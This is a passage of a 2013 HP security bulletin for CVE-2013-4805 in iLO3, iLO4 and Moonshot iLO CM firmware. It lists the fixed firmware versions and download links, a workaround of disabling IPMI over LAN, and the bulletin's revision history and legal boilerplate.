HP Moonshot iLO Chassis Management Firmware (iLO CM) versions prior to v1.02 BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2013-4805 (AV:N/AC:L/Au:N/C:P/I:P/A:C) 9.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following firmware updates available to resolve the vulnerability. HP Integrated Lights-Out 3 (iLO3) Online ROM Flash Component for Linux and Windows v1.60 or subsequent. iLO3 1.61 for Windows: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p901462262/v89959 iLO3 1.61 for Windows x64: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1728391553/v89958 iLO3 1.61 for Linux: ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1255562964/v89960 iLO3 1.61 for VMware ESXi: Extract the iLO firmware from the Windows or Linux component and flash the iLO directly, or use HP SUM. HP Integrated Lights-Out 4 (iLO4) Online ROM Flash Component for Linux and Windows v1.30 or subsequent. iLO4 1.30 for Windows: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1267515540/v80805 iLO4 1.30 for Windows x64: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1401725332/v80806 iLO4 1.30 for Linux: ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1950562118/v80804 iLO CM 1.02 for v1.5 MCP (Moonshot Component Pack) ftp://ftp.hp.com/pub/softl ib2/software1/supportpack-generic/p1423761203/v88991 NOTE: As an alternative to installing the patches, customers can disable IPMI over LAN in the iLO graphical user interface. Please refer to the appropriate version of the iLO user documentation for the product that you have. HISTORY Version:1 (rev.1) - 31 July 2013 Initial release Version: 2 (rev.2) - 20 August 2013 Added iLO CM, updated iLO3 to v1.61, changed VMware ESXi recommendation. Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlISpnYACgkQ4B86/C0qfVmltwCffQ9b+IQKRvs2BpXalaKleksp t1QAoOhhKFaiUSVUDeHnc7YLtNqUKIfG =NI3P -----END PGP SIGNATURE-----